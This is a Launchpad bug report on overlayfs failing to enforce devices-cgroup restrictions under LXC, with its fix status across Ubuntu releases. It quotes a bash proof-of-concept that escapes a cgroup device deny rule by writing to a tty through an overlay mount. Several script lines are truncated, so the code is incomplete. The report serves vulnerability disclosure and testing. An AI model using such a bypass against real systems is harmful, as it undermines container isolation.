overlayfs does not honor lxc-related permissions
Affects | Status | Importance | Assigned to | Milestone | |
---|---|---|---|---|---|
linux (Ubuntu) |
Fix Released
|
High
|
Andy Whitcroft | ||
Oneiric |
Fix Released
|
High
|
Andy Whitcroft | ||
Precise |
Fix Released
|
High
|
Andy Whitcroft | ||
lxc (Ubuntu) |
Invalid
|
Undecided
|
Unassigned | ||
Oneiric |
Invalid
|
Undecided
|
Unassigned | ||
Precise |
Invalid
|
Undecided
|
Unassigned |
Bug Description
Using overlayfs with lxc causes tty problems that can kill X. Overlayfs needs to honor the necessary cgroup permission calls, per the following information from Serge.
"""
here is a script which you can use to test the overlayfs
issue:
=======
#!/bin/bash
ddir=`cat /proc/self/
if [ "x$ddir" = "x" ]; then
echo "couldn't find devices cgroup mountpoint"
exit 1
fi
# create new cgroup
ndir=`mktemp -d --tmpdir=$ddir exploit-XXXX`
# create a directory onto which we mount the overlay
odir=`mktemp -d --tmpdir=/mnt exploit-XXXX`
# create the directory to be the overlay dir (where changes
# will be written)
udir=`mktemp -d --tmpdir=/tmp exploit-XXX`
mount -t overlayfs -oupperdir=
echo $$ > $ndir/tasks
# deny all device actions
echo a > $ndir/devices.deny
# but allow mknod of tty7, bc we have to mknod it in the writeable
# overlay
echo "c 4:5 m" > $ndir/devices.allow
echo "devices.list: XXXXXXXXXXXXXXX"
cat $ndir/devices.list
echo "XXXXXXXXXXXX"
# try writing to /dev/tty5 - not allowed
echo x > /dev/tty5
echo "write to /dev/tty5 returned $?"
# try writing to tty5 on the overlayfs - SHOULD not be allowed
echo y > $odir/tty5
echo "write to $odir/tty5 returned $?"
umount $odir
rmdir $odir
rm -rf $udir
# move ourselves back to root cgroup (else we can't delete the temp one
# bc it's occupied - by us)
echo $$ > $ddir/tasks
rmdir $ndir
=======
The write to /dev/tty5 will fail, but the write to $odir/tty5 will
succeed.
fs/overlayfs/
of what fs/namei.
devcgroup_
"""
[This blocks resolution of bug 914169]
Changed in launchpad: | |
status: | New → Triaged |
importance: | Undecided → High |
Changed in lxc (Ubuntu): | |
importance: | Undecided → Medium |
affects: | launchpad → linux |
no longer affects: | linux |
Changed in linux (Ubuntu): | |
importance: | Undecided → High |
assignee: | nobody → Andy Whitcroft (apw) |
status: | New → In Progress |
security vulnerability: | no → yes |
Changed in lxc (Ubuntu): | |
status: | New → Invalid |
tags: | added: patch |
Changed in linux (Ubuntu): | |
status: | In Progress → Fix Committed |
Changed in linux (Ubuntu Oneiric): | |
status: | New → Fix Committed |
importance: | Undecided → High |
assignee: | nobody → Andy Whitcroft (apw) |
Changed in lxc (Ubuntu Oneiric): | |
status: | New → Invalid |
Changed in lxc (Ubuntu Precise): | |
importance: | Medium → Undecided |
Proposed patch for Precise